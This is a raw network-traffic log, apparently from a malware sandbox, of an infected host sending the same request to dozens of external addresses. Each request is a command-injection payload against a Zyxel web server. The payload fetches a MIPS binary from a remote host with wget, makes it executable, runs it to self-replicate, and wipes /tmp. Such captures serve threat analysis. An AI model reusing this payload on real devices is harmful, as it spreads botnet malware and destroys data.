                              Mar 31, 2024 08:41:10.600728035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1802192.168.2.1334152221.237.255.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600785017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1803192.168.2.134812817.163.247.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600827932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1804192.168.2.1353092122.127.232.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600874901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1805192.168.2.1342862144.210.151.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600903988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1806192.168.2.1349142222.126.100.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600960970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1807192.168.2.1333492166.162.184.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.600992918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1808192.168.2.1343228210.81.188.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601042986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1809192.168.2.1338120184.175.53.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601056099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1810192.168.2.134217059.76.145.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601092100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1811192.168.2.134149869.141.71.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601147890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1812192.168.2.135423881.6.2.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601212978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1813192.168.2.1347134203.25.89.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601242065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1814192.168.2.1348626199.131.95.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.601274014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1815192.168.2.1341762132.244.204.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.604943037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1816192.168.2.134298454.67.146.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.604971886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1817192.168.2.1357402115.248.4.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605016947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1818192.168.2.135507639.200.166.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605037928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1819192.168.2.133912486.100.216.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605082989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1820192.168.2.1344416189.179.176.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605113983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1821192.168.2.133979260.91.236.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605144978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1822192.168.2.1351390164.64.17.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605211973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1823192.168.2.133369236.182.67.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605247974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1824192.168.2.133791254.241.171.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.605273008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1825192.168.2.1339014162.208.84.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.610950947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1826192.168.2.1338260216.39.1.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.610992908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1827192.168.2.1350016194.241.97.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611030102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1828192.168.2.1335530111.29.148.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611092091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1829192.168.2.1335332182.102.143.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611113071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1830192.168.2.1357466174.253.24.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611162901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1831192.168.2.1338840205.0.172.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611215115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1832192.168.2.1340666181.249.245.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611239910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1833192.168.2.1348440137.31.244.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611274004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1834192.168.2.133701092.146.104.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611284018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1835192.168.2.135349812.222.136.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611330986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1836192.168.2.134261649.204.247.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611387014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1837192.168.2.134432476.125.124.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611428976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1838192.168.2.134132295.19.115.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611484051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1839192.168.2.1355100165.22.178.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611524105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1840192.168.2.1345982158.47.2.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611584902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1841192.168.2.1338444196.14.129.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611603975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1842192.168.2.134440046.22.96.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611663103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1843192.168.2.1339212137.167.170.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611713886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1844192.168.2.1332962147.158.147.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611731052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1845192.168.2.1349856173.208.69.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611797094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1846192.168.2.134606836.148.154.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611839056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1847192.168.2.1338688101.237.242.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611906052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1848192.168.2.1346262149.184.177.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.611951113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1849192.168.2.1358082218.80.179.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.612008095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1850192.168.2.1355068222.43.241.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:11.612037897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1851192.168.2.133808457.5.187.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621411085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1852192.168.2.1340706146.102.169.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621475935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1853192.168.2.134753086.156.142.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621535063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1854192.168.2.1345214198.197.229.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621555090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1855192.168.2.1360624180.140.68.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621598959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1856192.168.2.1358106162.113.47.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621627092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1857192.168.2.1345198157.133.168.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621664047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1858192.168.2.134892864.173.187.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621706009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1859192.168.2.1352184120.222.116.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621732950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1860192.168.2.134848090.109.128.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621767998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1861192.168.2.1351094212.98.90.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621814013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1862192.168.2.1346884161.183.160.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621845007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1863192.168.2.1345252120.202.208.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621900082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1864192.168.2.1359858145.16.98.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621951103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1865192.168.2.1350354187.69.1.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.621979952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1866192.168.2.1333808131.247.165.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622014999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1867192.168.2.136042845.72.227.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622031927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1868192.168.2.1360274200.61.241.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622092009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1869192.168.2.1355906155.200.78.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622116089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1870192.168.2.1360200146.91.204.77443
                              TimestampBytes transferredDirectionData
